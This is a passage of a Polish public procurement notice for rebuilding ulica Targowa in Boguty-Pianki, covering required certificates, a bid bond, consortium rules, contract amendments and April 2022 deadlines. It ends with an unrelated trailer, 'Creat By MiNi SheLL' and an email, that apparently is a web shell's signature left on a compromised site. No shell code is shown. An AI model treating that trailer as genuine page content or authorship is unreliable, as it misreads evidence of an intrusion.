przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>4) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>5) oświadczenia wykonawcy o aktualności informacji zawartych w Oświadczeniu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu składanym na podstawie art. 274 ust. 1<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (załącznik nr 4 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia zdolności technicznej i zawodowej Zamawiający<br/>wymaga złożenia:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – wykaz robót budowlanych należy<br/>sporządzić zgodnie z treścią załącznika nr 5 do SWZ;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami oraz wymaganymi<br/>dokumentami potwierdzającymi posiadane kwalifikacje i doświadczenie – wykaz osób należy<br/>sporządzić zgodnie z treścią załącznika nr 6 do SWZ.<br/>3.W celu potwierdzenia sytuacji ekonomicznej lub finansowej Zamawiający wymaga złożenia<br/>dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>mniejszą niż 1 000 000 zł.<br/>4.Zamawiający będzie żądał od Wykonawcy, który polega na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby przedstawienia oświadczenia tego podmiotu o<br/>aktualności informacji zawartych w oświadczeniu o którym mowa w Rozdziale IX ust. 1 pkt 2 (Załącznik<br/>nr 4).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z wymaganiami SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść<br/>wadium w wysokości 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100 groszy).<br/>2. Wykonawca może wnieść wadium w:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.<br/>4. Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek: Bank Spółdzielczy<br/>Czyżew Oddział Boguty 17874710180260154420000020 z dopiskiem: „Wadium na przebudowę<br/>ulicy Targowej w miejscowości Boguty-Pianki&#34;.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt<br/>2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące<br/>wymagania:<br/>• oferta wspólna powinna być sporządzona zgodnie z SWZ,<br/>• sposób składania dokumentów w ofercie wspólnej:<br/>- dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do<br/>wykluczenia, spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców<br/>składających ofertę wspólną we własnym imieniu;<br/>- dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe<br/>składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę<br/>wspólną;<br/>• kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą<br/>być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do<br/>reprezentowania tych Wykonawców.<br/>• Przed podpisaniem umowy (w przypadku wyboru oferty jako najkorzystniejszej) Wykonawcy<br/>składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę<br/>konsorcjum, zawierającą, co najmniej:<br/>- zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim<br/>zakresem realizację przedmiotu zamówienia,<br/>- określenie zakresu działania poszczególnych stron umowy,<br/>- czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji zmiany obowiązujących<br/>przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego<br/>stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej informacji stanowiącej<br/>podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu<br/>wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Inicjatorem tej zmiany<br/>może być Zamawiający lub Wykonawca.<br/>2. Zamawiający dopuszcza zmianę kierownika budowy oraz innych osób biorących po stronie<br/>Wykonawcy udział w realizacji przedmiotu umowy, w sytuacji zdarzeń losowych oraz w<br/>przypadku niewywiązywania się z pełnionych obowiązków. Inicjatorem zmiany może być<br/>Zamawiający i Wykonawca. Zmiana musi nastąpić na osoby, które spełniają warunki określone<br/>w SWZ. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji<br/>stanowiącej podstawę do wprowadzenia zmian. Zmiany te nie wpłyną na termin wykonania prac<br/>i nie spowodują zmiany wynagrodzenia Wykonawcy.<br/>3. Zamawiający, po wyrażeniu zgody, dopuszcza zmianę umowy w formie aneksu w przypadku:<br/>1) wystąpienia nieprzewidzianych warunków i zjawisk atmosferycznych (kataklizmy),<br/>2) wystąpienia siły wyższej np.: trąby powietrznej, pożaru, powodzi,<br/>3) wstrzymania budowy przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę<br/>robót budowlanych, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu, szczątków<br/>ludzkich itp.,<br/>4) wystąpienia innych nieprzewidzianych i uzasadnionych okoliczności,<br/>5) wystąpienia następstw działań administracyjnych (np. konieczności uzyskania wyroku<br/>sądowego lub innego orzeczenia sądu lub organu, którego konieczności nie przewidziano na<br/>etapie zawarcia umowy),<br/>6) konieczności przerwania robót z uwagi na wystąpienie obiektywnych przyczyn technicznych,<br/>7) wstrzymania prac budowlanych przez właściwy organ z przyczyn niezawinionych przez<br/>Wykonawcę,<br/>8) wystąpienia innych okoliczności nie powstałych z winy Wykonawcy,<br/>9) konieczności wykonania robót dodatkowych, których wykonanie jest niezbędne dla<br/>prawidłowego wykonania oraz zakończenia przedmiotu zamówienia.<br/>4. Inicjatorem zmiany może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w<br/>formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia<br/>zmian. Zmiana ta może spowodować zmianę terminu wykonania prac i zmianę wynagrodzenia<br/>Wykonawcy.<br/>5. Zamawiający dopuszcza zmianę jakości lub innych parametrów charakterystycznych dla<br/>danego elementu robót budowlanych lub zmianę technologii ze względu na zmianę postępu<br/>technologicznego (np. wycofanie produktu z rynku) w uzgodnieniu z Zamawiającym i dla niego<br/>korzystnych, w sytuacjach nie zawinionych przez Wykonawcę. Zmiany te nie wpłyną na termin<br/>wykonania prac i nie spowodują zmiany wynagrodzenia Wykonawcy.<br/>6. Zamawiający dopuszcza zmianę podwykonawcy. Zmiana ta nie wpłynie na termin wykonania<br/>prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Zmiana wymaga zgłoszenia w formie<br/>pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian.<br/>Inicjatorem zmiany może być Wykonawca.<br/>7. Dopuszcza się zmiany w umowie dotyczące wynagrodzenia Wykonawcy jeżeli zachodzi<br/>potrzeba wykonania prac nie ujętych w projekcie lub też w sytuacji zmiany projektu, jeżeli<br/>potrzeba wykonania prac lub zmian w projekcie zostanie potwierdzona przez inspektora nadzoru<br/>w protokole konieczności. Zamawiający przewiduje w tym zakresie możliwość udzielenia<br/>zamówienia na roboty dodatkowe zgodnie z art. 455 ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-22 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com